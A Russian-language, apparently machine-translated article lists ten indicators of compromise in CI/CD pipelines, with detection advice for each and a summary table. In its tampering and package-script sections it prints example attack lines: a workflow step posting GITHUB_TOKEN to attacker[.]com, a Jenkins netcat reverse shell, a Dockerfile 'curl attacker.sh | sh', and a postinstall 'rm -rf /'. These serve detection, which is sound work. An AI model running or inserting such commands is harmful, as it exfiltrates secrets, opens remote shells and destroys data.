Введение: Каковы индикаторы компрометации в сфере кибербезопасности?
Индикаторы компрометации — это первые предупреждающие знаки о том, что ваша система или pipeline может быть атакован. Проще говоря, индикаторы компрометации следы, оставленные злоумышленниками, как странные logins, изменения файлов или скрытые вредоносные программы. В Кибербезопасность МОК, они действуют как отпечатки пальцев на месте преступления, давая вам явное доказательство того, что что-то не так. Поэтому, когда разработчики спрашивают что является индикаторами компрометации, ответ не ограничивается серверами или брандмауэрами, он также включает риски, скрытые в современных CI/CD pipelines.
В этих pipelines, злоумышленники могут незаметно вносить изменения в код, внедрять вредоносные зависимости или изменять этапы сборки. Однако большинство руководств по-прежнему сосредоточены только на серверах или сетях. В результате цепочка поставок программного обеспечения стала одной из самых лёгких целей.
Вот почему поиск индикаторов компромисса в CI/CD pipelines крайне важен. Прежде всего, он помогает командам блокировать вредоносное ПО, защищать конфиденциальную информацию и обеспечивать безопасность на каждом этапе разработки программного обеспечения.
10 главных признаков компрометации CI/CD Pipelines
При объяснении индикаторов компрометации большинство списков фокусируется на серверах или сетях. Однако в CI/CD pipelineЗлоумышленники оставляют совершенно разные «отпечатки пальцев». Распознавание этих сигналов критически важно для проактивной защиты. Ниже представлены 10 тревожных сигналов кибербезопасности, на которые должен обращать внимание каждый разработчик и инженер по безопасности.
1. Подозрительные изменения зависимости
Один из главных показателей компромисса в pipelines — это внезапное и странное обновление зависимостей. Злоумышленники часто пользуются доверием разработчиков к менеджерам пакетов, чтобы добавлять опасные пакеты.
Например, в npm package.json diff может неожиданно включать в себя:
+ "crypto-helper": "^1.0.2"
Такие изменения могут выглядеть безопасными, но могут внедрить троянизированный код в каждую сборку.
Влияние: Скомпрометированные сборки наследуют вредоносное ПО в источнике.
Обнаружение: постоянно проводить проверки зависимостей, отслеживать различия в файлах блокировки и сканировать новые пакеты.
2. Запутанный код в сборках
Авторы вредоносных программ используют обфускацию, чтобы обойти проверки. В результате этот индикатор компрометации CI/CD pipelines может быть одним из самых сложных для обнаружения. Более того, обфусцированные полезные данные часто незаметно проникают в библиотеки с открытым исходным кодом или образы контейнеров.
Например:
- Пакет PyPI, использующий
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - Образ Docker, упакованный ненужными двоичными файлами UPX.
- JavaScript полон
\x41\x42сбегает от укрывшихся похитителей учетных данных.
Влияние: Скрытый код выполняется незаметно во время сборки или выполнения, что делает его критически важным сигналом в сфере кибербезопасности IOC.
Обнаружение: Сочетать SAST Сканирование на наличие вредоносных программ для выявления закодированного или упакованного кода. Прежде всего, относитесь к обфускации как к сигналу тревоги, требующему дальнейшего расследования.
3. Раскрытые секреты Git: классический риск кибербезопасности IOC
CI/CD pipelines часто наследуют секреты непосредственно из репозиториев. Однако, когда в Git появляются секреты, они становятся одним из самых ясных ответов на вопрос «каковы индикаторы компрометации в pipelines?» Как только учетные данные попадают в Git, злоумышленники могут эксплуатировать их неограниченное количество времени.
Например:
- A
.envфайл, содержащийAWS_SECRET_KEY=. - Токены вставлены
config.json. - Секреты по-прежнему видны в истории Git даже после удаления.
Влияние: Открытые ключи дают злоумышленникам прямой доступ к CI/CD pipelines, облачных систем или баз данных. Поэтому это один из самых опасных индикаторов компрометации.
Обнаружение: Используйте pre-commit hooks и задания непрерывной интеграции для секретного сканирования, а также немедленное отзывание утечек ключей. Кроме того, необходимо обеспечить автоматическое исправление для сокращения периода раскрытия информации.
4. Подделка Pipeline Конфигурации: скрытые индикаторы компрометации
Pipeline Конфигурации являются высокоценными целями, потому что одно изменение часто блокирует весь рабочий процесс. Следовательно, подделали pipeline файлы представляют собой серьезный риск кибербезопасности МОК, который традиционные инструменты мониторинга редко обнаруживают.
Например:
В действиях GitHub:
- run: curl -X POST http://attacker[.]com --data $GITHUB_TOKEN- В GitLab: вредоносное задание добавлено в
.gitlab-ci.ymlкоторый сбрасывает конфиденциальные данные. - В Дженкинсе:
sh "nc -e /bin/bash attacker.com 4444".
Влияние: Эти не одобренные изменения превращают ваши pipeline в постоянную лазейку для злоумышленников, что явно можно считать признаком компрометации.
Обнаружение: Обеспечьте соблюдение подписанных конфигураций, требуйте одобрения PR и отслеживайте непредвиденные задачи. Кроме того, установите guardrails которые автоматически блокируют измененные рабочие процессы.
5. Привилегированные IaC По умолчанию
Неправильно настроенные определения инфраструктуры часто создают скрытые лазейки. В результате привилегированные значения по умолчанию в IaC являются классическим риском кибербезопасности МОК.
Например:
- Развертывание Kubernetes, предоставляющее модули
privileged: true. - Графики Helm, показывающие услуги с
0.0.0.0:22.
Влияние: Злоумышленники получают доступ с правами root или делают внутренние сервисы общедоступными. Следовательно, эти уязвимости значительно расширяют поверхность атаки.
Обнаружение: Применить IaC Сканирование для обеспечения минимальных привилегий перед слиянием. Кроме того, убедитесь, что каждая конфигурация проверена в рамках pipeline.
6. Необычное поведение сборки
Злоумышленники часто меняют pipeline Поведение, позволяющее ускользнуть от вредоносных действий. Другими словами, необычная активность сборки — один из самых чётких ответов на вопрос о том, что является признаком компрометации. CI/CD pipelines.
Например:
- Сборки, осуществляющие исходящие сетевые запросы к странным доменам.
- Проект Node.js внезапно порождает PowerShell во время
npm install. - Задание CI, загружающее большие двоичные файлы, не определенные в скриптах сборки.
Влияние: Скомпрометированные сборки могут служить точками распространения вредоносного ПО. Прежде всего, они распространяют вредоносную нагрузку по всем развёртываниям.
Обнаружение: Отслеживайте журналы сборки на предмет непредвиденных процессов или подключений. Кроме того, настройте обнаружение аномалий, чтобы отмечать поведение, выходящее за рамки нормы.
7. Вредоносные пакетные скрипты как риски кибербезопасности МОК
Менеджеры пакетов поддерживают жизненный цикл hooks Этим злоумышленники и пользуются. Поэтому вредоносные скрипты в npm, PyPI или Dockerfiles являются явными признаками компрометации.
Например:
- НПМ:
postinstallвыполнение скриптаrm -rf /или подача сигнала на C2. - PyPI:
setup.pyвыполнение скрытого кода Python при установке. - Докерфайл:
RUN curl attacker.sh | sh.
Влияние: Атака выполняется во время установки, до начала тестирования в режиме реального времени. Следовательно, разработчики могут не заметить её, пока не станет слишком поздно.
Обнаружение: Сканируйте манифесты пакетов на наличие установочных скриптов. Кроме того, ограничьте использование рискованных hooks in CI/CD рабочие места для снижения воздействия.
8. Индикаторы компрометации отравления реестра
Злоумышленники заменяют или изменяют артефакты в реестрах, и эти события являются хрестоматийными примерами того, что является индикаторами компрометации в цепочке поставок. pipelines.
Например:
- Тег образа Docker молча обновляется с помощью троянизированного слоя.
- Внутренний пакет заменен отравленной версией.
- сквоттинг пространства имен npm, например
lodash-proxy.
Влияние: Каждая сборка, использующая артефакт реестра, становится скомпрометированной. Более того, компрометация распространяется на нижестоящие сервисы.
Обнаружение: Обеспечьте проверку подписи и целостности для всех запросов на получение данных из реестра. Кроме того, отслеживайте происхождение артефактов с помощью SBOM Проверка.
9. Аномальная активность пользователей как доказательство МОК
Взломанные аккаунты почти всегда оставляют после себя аномальные следы. Соответственно, необычное поведение разработчика является весомым признаком компрометации.
Например:
- Commits перенесено на 3 часа утра по местному времени.
- PR-одобрения по счетам, находящимся в отпуске.
- Pipelineсрабатывает с необычной частотой.
Влияние: Злоумышленники используют украденные учетные данные для внесения вредоносных изменений. Ведь несанкционированные commitлегко встраиваются в обычные рабочие процессы.
Обнаружение: Монитор SCM Отслеживайте аномальную активность, применяйте многофакторную аутентификацию (MFA) и регулярно проводите ротацию токенов. Кроме того, оповещайте о подозрительных commit или шаблоны одобрения.
10. Неудачные проверки целостности или подписи в системе кибербезопасности МОК
Распространенный, но игнорируемый индикатор компрометации Неудачная проверка целостности или подписи. В кибербезопасности IOC эти проверки подтверждают подлинность кода или артефактов. Пропуск этих проверок приводит к pipelineподвергается воздействию.
Примеры:
- Хэш SHA256 не соответствует ожидаемой контрольной сумме.
- Отсутствует или недействительна подпись GPG.
- An SBOM показаны неподписанные артефакты.
Влияние: Нарушения целостности часто подразумевают подделку, отравление реестра или внедрение вредоносного ПО.
Обнаружение: Автоматизируйте проверку подписей, обеспечьте проверку контрольных сумм и блокируйте неподписанные компоненты. И самое главное, воспринимайте каждую неудачную проверку как явное доказательство компрометации.
CI/CD Краткий обзор индикаторов компрометации
| Индикатор компромисса (IOC) | Воздействие в CI/CD Pipelines | Как обнаружить |
|---|---|---|
| Подозрительные изменения зависимости | Злоумышленники внедряют вредоносные библиотеки в менеджеры пакетов, что приводит к компрометации сборок. | Отслеживайте различия в файлах блокировки, обеспечивайте проверку зависимостей и непрерывно сканируйте зависимости. |
| Запутанный код в сборках | Скрытые полезные данные выполняются во время сборки или выполнения без обнаружения. | Используйте SAST и сканирование на наличие вредоносных программ для выявления шаблонов кода base64, hex или упакованного кода. |
| Секреты Git раскрыты | Утечка токенов или ключей API предоставляет злоумышленникам прямой доступ к критически важным системам. | Запускайте секретные сканирования в Git hooks и автоматически отзывать украденные учетные данные. |
| подделка Pipeline Конфигурации | Модифицированные рабочие процессы позволяют осуществлять эксфильтрацию данных или их сохранение внутри CI/CD. | Требуйте одобрения PR, обеспечивайте соблюдение подписанных конфигураций и контролируйте pipeline изменений. |
| Привилегированный IaC По умолчанию | Чрезмерно разрешительные роли или небезопасные значения по умолчанию подвергают облачные среды риску. | Сканируйте файлы Terraform, Kubernetes и Helm для обеспечения соблюдения принципа наименьших привилегий. |
| Необычное поведение сборки | Pipelineиспользуются в качестве точек распространения вредоносного ПО или для горизонтального перемещения. | Анализируйте журналы сборки на предмет неожиданных загрузок, процессов или исходящих вызовов. |
| Вредоносные пакетные скрипты | Скрытые пред- и пост-установочные скрипты запускают полезные нагрузки перед тестированием во время выполнения. | Блокируйте рискованные скрипты npm/PyPI и ограничивайте их выполнение CI/CD рабочие места. |
| Отравление реестра | Троянизированные артефакты заменяют доверенные образы или двоичные файлы в реестрах. | Проверяйте контрольные суммы, обеспечивайте проверку подписей и заблаговременно сканируйте реестры. |
| Аномальная активность пользователей | Скомпрометированные учетные записи распространяют вредоносные commits или триггер pipelines. | Обеспечить соблюдение МИД, контролировать commits для аномалий и анализировать login узоры. |
| Неудачные проверки целостности или подписи | Указывает на наличие поддельного кода, зависимостей или изображений, попавших в pipeline. | Автоматизируйте проверки целостности и блокируйте неподписанные или несоответствующие компоненты. |
Почему традиционная кибербезопасность МОК терпит неудачу CI/CD Риски
Большинство организаций уже отслеживают индикаторы компрометации серверов, компьютеров или сетей. Однако этот классический подход к кибербезопасности, связанной с IOC, игнорирует CI/CD pipelines, которые сейчас являются одной из самых уязвимых поверхностей для атак. На самом деле, pipelines показывают уникальные сигналы компрометации, которые традиционные инструменты не могут обнаружить.
Индикаторы компрометации традиционной безопасности
В традиционных аспектах кибербезопасности МОК основное внимание обычно уделяется:
- Необычно loginили IP-адреса, которые указывают на украденные учетные данные.
- Подозрительные хэши файлов или изменения реестра, указывающие на наличие вредоносного ПО.
- Неожиданный исходящий трафик, указывающий на утечку данных.
Это известные показатели, которые также отслеживаются в Фреймворк MITER ATT & CK, который отображает типичное поведение и тактику злоумышленников. Это полезные сигналы. Однако они применимы в основном к операционным системам или корпоративным сетям. В результате они пропускают тонкие вмешательства, которые происходят на ранних этапах цепочки поставок программного обеспечения.
Почему CI/CD Pipelines разные
CI/CD pipelines — это автоматизированные среды, где разработчики commit Код, извлечение зависимостей и выпуск сборок. Злоумышленники знают, что одна компрометация здесь распространяется каскадом на все развертывания. Соответственно, что является индикаторами компрометации в CI/CD pipelines? Они выглядят совсем по-другому:
- Вредоносная зависимость, скрытно добавленная в package.json или requirements.txt.
- API-ключи или токены, представленные в Git commits или .env файлы.
- Запутанный код, внедренный в пакеты npm или PyPI.
- Файлы Terraform или Kubernetes с небезопасными значениями по умолчанию, такими как privileged: true.
- Pipeline задания, отредактированные с целью кражи данных или открытия бэкдоров.
Эти сигналы компромисса в CI/CD оставаться невидимым для standard инструменты безопасности.
Пробел в кибербезопасности МОК
Хотя многие команды понимают ценность индикаторов компрометации, они по-прежнему полагаются только на данные, полученные с серверов и сетевых журналов. Таким образом, злоумышленники могут «отравлять» сборки или внедрять вредоносное ПО, не оставляя привычных следов. Именно поэтому такие инциденты, как бэкдор XZ Utils или вредоносные npm-пакеты, оставались незамеченными до тех пор, пока не попали в эксплуатацию.
Подобные компромиссы в цепочке поставок также подчеркиваются CISРуководство по безопасности цепочки поставок A, который предупреждает, что злоумышленники все чаще выбирают своей целью CI/CD pipelineи реестры.
Еда на вынос
Традиционная кибербезопасность МОК необходима, но недостаточна. Прежде всего, команды должны распознавать признаки компрометации, характерные для CI/CD pipelines. Только тогда они смогут обнаружить вредоносный код или pipeline злоупотребления до того, как они распространятся в других средах.







